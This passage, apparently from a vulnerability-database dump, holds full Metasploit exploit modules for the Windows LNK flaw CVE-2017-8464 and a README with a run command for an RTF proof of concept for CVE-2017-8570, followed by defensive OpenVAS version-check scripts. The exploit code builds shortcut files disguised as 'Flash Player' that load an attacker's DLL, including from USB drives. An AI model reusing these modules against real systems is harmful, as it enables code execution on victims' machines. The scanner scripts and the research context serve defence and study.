discovery\r\n 'Yorick Koster' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://paper.seebug.org/357/'], # writeup\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is 64-bit\r\n 'DisclosureDate' => 'Jun 13 2017'))\r\n \r\n register_advanced_options(\r\n [\r\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\r\n ])\r\n end\r\n \r\n def exploit\r\n dll = generate_payload_dll\r\n dll_name = \"#{rand_text_alpha(16)}.dll\"\r\n dll_path = store_file(dll, dll_name)\r\n print_status(\"#{dll_path} created copy it to the root folder of the target USB drive\")\r\n \r\n # HACK the vulnerability doesn't appear to work with UNC paths\r\n # Create LNK files to different drives instead\r\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\r\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\r\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\r\n print_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\")\r\n end\r\n end\r\n \r\n def generate_link(path)\r\n path << \"\\x00\"\r\n display_name = \"Flash Player\\x00\" # LNK Display Name\r\n comment = \"\\x00\"\r\n \r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n \r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n \r\n # IDList\r\n idlist_data = ''\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # This PC\r\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n \r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n \r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\n \r\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\r\n def store_file(data, filename)\r\n ltype = \"exploit.fileformat.#{self.shortname}\"\r\n \r\n if ! ::File.directory?(Msf::Config.local_directory)\r\n FileUtils.mkdir_p(Msf::Config.local_directory)\r\n end\r\n \r\n if filename and not filename.empty?\r\n if filename =~ /(.*)\\.(.*)/\r\n ext = $2\r\n fname = $1\r\n else\r\n fname = filename\r\n end\r\n else\r\n fname = \"local_#{Time.now.utc.to_i}\"\r\n end\r\n \r\n fname = ::File.split(fname).last\r\n \r\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\r\n fname << \".#{ext}\"\r\n \r\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\r\n full_path = ::File.expand_path(path)\r\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\r\n \r\n full_path.dup\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/28197", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T16:16:00", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-03-09T00:00:00", "type": "zdt", "title": "Microsoft Office - Composite Moniker Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2018-03-09T00:00:00", "id": "1337DAY-ID-29976", "href": "https://0day.today/exploit/description/29976", "sourceData": "## What?\r\n \r\nThis repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the \"Composite Moniker\" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.\r\n \r\nDownload: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44263.zip\r\n \r\n## Why?\r\n \r\nA few reasons.\r\n \r\n1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.\r\n2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the \"Script Moniker\" variant of CVE-2017-0199 and are not actually composite moniker exploits.\r\n3. Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.\r\n \r\n## How to run\r\n \r\nSimply run the script, providing an Sct file to execute, and an output name for your RTF file:\r\n \r\n python packager_composite_moniker.py -s calc.sct -o example.rtf\r\n [+] RTF file written to: example.rtf\r\n \r\n \r\n## Detection\r\n \r\nI have included a Yara rule to detect attempts to exploit this vulnerability via RTF.\r\n \r\n## References\r\n \r\n- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html\r\n- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/\r\n- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/29976", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-05T21:30:22", "description": "This Metasploit module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. The PATH option must be an absolute path to a writeable directory which is indexed for searching. If no PATH is specified, the module defaults to %USERPROFILE%.", "cvss3": {}, "published": "2017-11-09T00:00:00", "type": "zdt", "title": "Microsoft Windows LNK File Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2015-0095"], "modified": "2017-11-09T00:00:00", "id": "1337DAY-ID-28973", "href": "https://0day.today/exploit/description/28973", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n\r\n attr_accessor :exploit_dll_name\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'LNK Code Execution Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\r\n that contain a dynamic icon, loaded from a malicious DLL.\r\n\r\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\r\n similar except an additional SpecialFolderDataBlock is included. The folder ID set\r\n in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass\r\n the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary\r\n DLL file.\r\n\r\n The PATH option must be an absolute path to a writeable directory which is indexed for\r\n searching. If no PATH is specified, the module defaults to %USERPROFILE%.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability discovery\r\n 'Yorick Koster', # msf module\r\n 'Spencer McIntyre' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\r\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\r\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\r\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'FileDropperDelay' => 15,\r\n 'WfsDelay' => 30\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is Automatic\r\n 'DisclosureDate' => 'Jun 13 2017'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [false, 'The LNK file']),\r\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),\r\n OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])\r\n ]\r\n )\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\r\n OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n if session.sys.process['SearchIndexer.exe']\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_name(option, default_ext)\r\n name = datastore[option].to_s.strip\r\n name = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank?\r\n name\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if session.platform != 'windows'\r\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\r\n arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']\r\n datastore['EXE::Path'] = path\r\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\r\n\r\n path = datastore['PATH'] || session.fs.file.expand_path(\"%USERPROFILE%\")\r\n path.chomp!(\"\\\\\")\r\n\r\n dll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\"\r\n write_file(dll_path, generate_payload_dll)\r\n\r\n lnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\"\r\n write_file(lnk_path, generate_link(dll_path))\r\n register_files_for_cleanup(dll_path, lnk_path)\r\n end\r\n\r\n def file_rm(file)\r\n if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)\r\n @dropped_files.delete(file)\r\n end\r\n end\r\n\r\n def generate_link(path)\r\n vprint_status(\"Generating LNK file to load: #{path}\")\r\n path += \"\\x00\" # Do not use << here\r\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\r\n comment = datastore['LnkComment'].dup << \"\\x00\"\r\n\r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n\r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n\r\n # IDList\r\n idlist_data = ''\r\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\r\n idlist_data << [0x12 + 2].pack('v')\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n\r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n\r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28973", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-08T13:49:25", "description": "This host is missing a critical security\n update according to Microsoft KB4021903", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811159", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811159", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811159\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8464\");\n script_bugtraq_id(98818);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 09:16:15 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4021903\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error when\n Microsoft Windows allow a .LNK file to be processed.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the local user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4021903\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, winVista:3, winVistax64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19785\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19785\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24101\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24101\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:02", "description": "This host is missing an important security\n update according to Microsoft KB3213624", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811233\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:27:17 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213624\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2010 Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213624\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(14\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office14\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"14.0\", test_version2:\"14.0.7184.4999\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '14.0 - 14.0.7184.4999' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:57", "description": "This host is missing an important security\n update according to Microsoft KB3213555", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811451", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811451", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811451\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 08:22:48 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213555\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when it fails to\n properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213555\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = 